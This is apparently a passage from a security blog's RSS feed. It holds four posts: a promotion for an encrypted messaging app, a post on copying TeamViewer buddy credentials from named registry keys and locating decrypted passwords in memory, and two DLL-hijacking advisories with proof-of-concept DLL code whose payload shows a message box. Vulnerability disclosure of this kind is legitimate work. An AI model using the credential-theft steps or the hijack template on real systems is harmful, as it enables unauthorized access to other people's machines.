<p><a href="http://xlocux.files.wordpress.com/2011/05/sab2.png"><img class="aligncenter size-full wp-image-540" title="sab" src="http://xlocux.files.wordpress.com/2011/05/sab2.png?w=450" alt=""   /></a></p>
<p><span id="more-510"></span></p>
<p>SecMes is a tool usefull to secure your E-Mail and SMS with 256-bit <a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard" target="_blank">AES encryption</a>, you can send and receive encrypted message between friends, just setting the same key.</p>
<div id="attachment_529" class="wp-caption aligncenter" style="width: 326px"><a href="http://xlocux.files.wordpress.com/2011/05/senc.png"><img class="size-full wp-image-529" title="senc" src="http://xlocux.files.wordpress.com/2011/05/senc.png?w=450" alt=""   /></a><p class="wp-caption-text">Main Screen</p></div>
<p>It also allow to save separated key for each contact, in order to have different keys for any friends.</p>
<div id="attachment_530" class="wp-caption aligncenter" style="width: 326px"><a href="http://xlocux.files.wordpress.com/2011/05/saddc.png"><img class="size-full wp-image-530" title="saddc" src="http://xlocux.files.wordpress.com/2011/05/saddc.png?w=450" alt=""   /></a><p class="wp-caption-text">userlist</p></div>
<p>All the keys are stored in the phone so i added a login screen to access the main page just to get more privacy from other eyes.</p>
<div id="attachment_531" class="wp-caption aligncenter" style="width: 326px"><a href="http://xlocux.files.wordpress.com/2011/05/slogin.png"><img class="size-full wp-image-531" title="slogin" src="http://xlocux.files.wordpress.com/2011/05/slogin.png?w=450" alt=""   /></a><p class="wp-caption-text">login</p></div>
<p>Url:<a href="http://www.multiupload.com/VL40DXWOAE"> SecMes 1.4.11.rar</a></p>
<p><strong>Pass: locu</strong></p>
<p><strong>MD5 Checksum: 8330FA9BACBD5CAD18D099038F73F83E</strong></p>
<p><span style="color:#ff0000;"><strong>Donate</strong></span></p>
<p><span style="color:#008000;">BitCoin Hash: <strong>1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST</strong></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/510/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/510/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/510/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=510&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/05/09/windows-phone-7-secmes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" medium="image">
			<media:title type="html">More...</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/sab2.png" medium="image">
			<media:title type="html">sab</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/senc.png" medium="image">
			<media:title type="html">senc</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/saddc.png" medium="image">
			<media:title type="html">saddc</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/slogin.png" medium="image">
			<media:title type="html">slogin</media:title>
		</media:content>
	</item>
		<item>
		<title>2 Cent About Team Viewer Buddies</title>
		<link>http://xlocux.wordpress.com/2011/04/17/team-viewer/</link>
		<comments>http://xlocux.wordpress.com/2011/04/17/team-viewer/#comments</comments>
		<pubDate>Sun, 17 Apr 2011 01:09:49 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[(In)Security]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Social engineering]]></category>
		<category><![CDATA[Team Viewer]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=487</guid>
		<description><![CDATA[Nowadays TeamViewer (TV) is one of the best remote desktop application, its use is widely diffused in all the net from private customers to business. Apparently it seems to be bug free but with a bit of Social Engineering it could become an open windows on your system an your TV buddies. Let&#8217;s immaginate a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=487&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Nowadays TeamViewer (TV) is one of the best remote desktop application, its use is widely diffused in all the net from private customers to business. Apparently it seems to be bug free but with a bit of Social Engineering it could become an open windows on your system an your TV buddies. <span id="more-487"></span> <a href="http://xlocux.files.wordpress.com/2011/04/tv5.png"><img class="aligncenter size-full wp-image-513" title="tv5" src="http://xlocux.files.wordpress.com/2011/04/tv5.png?w=450&#038;h=353" alt="" width="450" height="353" /></a>Let&#8217;s immaginate a scenario where the attacker has got access to a victim&#8217;s pc with TV installed he could copy the TV registry keys where the buddies password are stored in order to gain access also to their machines. The buddies settings are saved in the following keys:</p>
<pre>HKEY_CURRENT_USER\Software\TeamViewer\Version5", "BuddyLoginName"
HKEY_CURRENT_USER\Software\TeamViewer\Version5", "BuddyLoginPWAES"</pre>
<p>User and password are encrypted with <a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard" target="_blank">AES </a>but this is not a real problem because you can directly copy the keys into your registry and the job is done, now you can login on TV buddies with the victim account if they are using a default password of course.</p>
<blockquote><p>It&#8217;s also possible to debug TV to decrypt the passwords at fly but is boring, I choose to use WinHex to check the process memory with an adequate pattern.</p></blockquote>
<p><a href="http://xlocux.files.wordpress.com/2011/04/whmem.png"><img class="aligncenter size-full wp-image-558" title="whmem" src="http://xlocux.files.wordpress.com/2011/04/whmem.png?w=450" alt=""   /></a></p>
<blockquote><p>This byte sequence should help to land very close to the decrypted password.</p></blockquote>
<p><strong>77006C006D00610069006C002E006500780065</strong></p>
<p>The &#8220;bug&#8221;, as always, is located at half road between the monitor and the back of the chair, this is the concept where the social engineering is focused. I wont go over the lines but todays this type of hoax is the best tool that the hackers can use to gain informations or exploit their target. So be carefull when you store your password somewhere.</p>
<pre></pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/487/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/487/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/487/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=487&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/04/17/team-viewer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/04/tv5.png" medium="image">
			<media:title type="html">tv5</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/04/whmem.png" medium="image">
			<media:title type="html">whmem</media:title>
		</media:content>
	</item>
		<item>
		<title>Mega Menager &lt;= 3.4.0.9 Insecure Library Loading Vulnerability</title>
		<link>http://xlocux.wordpress.com/2011/03/02/mega-menager-3-4-0-9-insecure-library-loading-vulnerability/</link>
		<comments>http://xlocux.wordpress.com/2011/03/02/mega-menager-3-4-0-9-insecure-library-loading-vulnerability/#comments</comments>
		<pubDate>Wed, 02 Mar 2011 12:06:16 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[(In)Security]]></category>
		<category><![CDATA[Advisory]]></category>
		<category><![CDATA[DLL Hijacking]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Mega Manager]]></category>
		<category><![CDATA[vunerability]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=498</guid>
		<description><![CDATA[============ { Advisory 02/03/2011 } ============= /* PoC Title: Mega Menager &#60;= 3.4.0.9 Insecure Library Loading Vulnerability (dwmapi.dll,msjet49.dll,msjet48.dll,msjet47.dll,msjet46.dll,msjet45.dll) Software Link: http://www.megaupload.com/?c=tools Associated Extension: .megamanager Tested on: Windows xp sp3 x32 */ #include &#60;windows.h&#62; BOOL WINAPI DllMain ( HANDLE    hinstDLL, DWORD     fdwReason, LPVOID    lpvReserved ) { switch (fdwReason) { case DLL_PROCESS_ATTACH: exploit(); [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=498&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://xlocux.files.wordpress.com/2011/03/mega1.png"><img class="aligncenter size-full wp-image-500" title="mega1" src="http://xlocux.files.wordpress.com/2011/03/mega1.png?w=450&#038;h=35" alt="" width="450" height="35" /></a><a href="http://xlocux.files.wordpress.com/2011/03/mega.png"><br />
</a><span id="more-498"></span></p>
<p>============ { Advisory 02/03/2011 } =============</p>
<p>/*</p>
<p>PoC Title: Mega Menager &lt;= 3.4.0.9 Insecure Library Loading Vulnerability</p>
<p>(dwmapi.dll,msjet49.dll,msjet48.dll,msjet47.dll,msjet46.dll,msjet45.dll)</p>
<p>Software Link: http://www.megaupload.com/?c=tools</p>
<p>Associated Extension: .megamanager</p>
<p>Tested on: Windows xp sp3 x32</p>
<p>*/<br />
#include &lt;windows.h&gt;</p>
<p>BOOL WINAPI DllMain (</p>
<p>HANDLE    hinstDLL,</p>
<p>DWORD     fdwReason,</p>
<p>LPVOID    lpvReserved</p>
<p>)</p>
<p>{</p>
<p>switch (fdwReason)</p>
<p>{</p>
<p>case DLL_PROCESS_ATTACH:</p>
<p>exploit();</p>
<p>case DLL_THREAD_ATTACH:</p>
<p>case DLL_THREAD_DETACH:</p>
<p>case DLL_PROCESS_DETACH:</p>
<p>break;    }</p>
<p>return TRUE;}</p>
<p>int exploit()</p>
<p>{</p>
<p>MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);</p>
<p>}</p>
<p>/*</p>
<p>Credits:</p>
<p># Discoverd By: Locu</p>
<p># Website: http://xlocux.wordpress.com</p>
<p># Contacts: xlocux[-at-]gmail.com</p>
<p>*/</p>
<p>================== { EOF } =====================</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/498/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/498/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/498/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=498&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/03/02/mega-menager-3-4-0-9-insecure-library-loading-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/03/mega1.png" medium="image">
			<media:title type="html">mega1</media:title>
		</media:content>
	</item>
		<item>
		<title>HexWorkshop &lt;= 6.xx Insecure Library Loading Vulnerability</title>
		<link>http://xlocux.wordpress.com/2011/02/24/hexworkshop-insecure-library-loading-vulnerability/</link>
		<comments>http://xlocux.wordpress.com/2011/02/24/hexworkshop-insecure-library-loading-vulnerability/#comments</comments>
		<pubDate>Thu, 24 Feb 2011 14:40:45 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[DLL Hijacking]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[HexWorkshop]]></category>
		<category><![CDATA[vunerability]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=464</guid>
		<description><![CDATA[============ { Advisory 09/01/2011 } ============= /* PoC Title: Hex Workshop Insecure Library Loading Vulnerability (pe932d.dll,pe936d.dll,pegrc32d.dll) Software Link:: http://www.bpsoft.com Tested on: Windows xp sp3 x32 */ #include &#60;windows.h&#62; BOOL WINAPI DllMain ( HANDLE    hinstDLL, DWORD     fdwReason, LPVOID    lpvReserved ) { switch (fdwReason) { case DLL_PROCESS_ATTACH: exploit(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=464&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://xlocux.files.wordpress.com/2011/01/hws.png"><img class="aligncenter size-full wp-image-466" title="hws" src="http://xlocux.files.wordpress.com/2011/01/hws.png?w=450&#038;h=25" alt="" width="450" height="25" /></a><span id="more-464"></span></p>
<p>============ { Advisory 09/01/2011 } =============</p>
<p>/*</p>
<p>PoC Title: Hex Workshop Insecure Library Loading Vulnerability (pe932d.dll,pe936d.dll,pegrc32d.dll)<br />
Software Link:: http://www.bpsoft.com<br />
Tested on: Windows xp sp3 x32</p>
<p>*/<br />
#include &lt;windows.h&gt;</p>
<p>BOOL WINAPI DllMain (</p>
<p>HANDLE    hinstDLL,</p>
<p>DWORD     fdwReason,</p>
<p>LPVOID    lpvReserved</p>
<p>)</p>
<p>{</p>
<p>switch (fdwReason)</p>
<p>{</p>
<p>case DLL_PROCESS_ATTACH:</p>
<p>exploit();</p>
<p>case DLL_THREAD_ATTACH:</p>
<p>case DLL_THREAD_DETACH:</p>
<p>case DLL_PROCESS_DETACH:</p>
<p>break;    }</p>
<p>return TRUE;}</p>
<p>int exploit()</p>
<p>{</p>
<p>MessageBox(0, &#8220;Hijacked!!!&#8221;, &#8220;DLL Message&#8221;, MB_OK);</p>
<p>}</p>
<p>/*</p>
<p>Credits:</p>
<p># Discoverd By: Locu</p>
<p># Website: http://xlocux.wordpress.com</p>
<p># Contacts: xlocux[-at-]gmail.com</p>
<p>*/</p>
<p>================== { EOF } =====================</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/464/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/464/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/464/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=464&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/02/24/hexworkshop-insecure-library-loading-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/01/hws.png" medium="image">
			<media:title type="html">hws</media:title>
		</media:content>
	</item>
	</channel>
</rss>
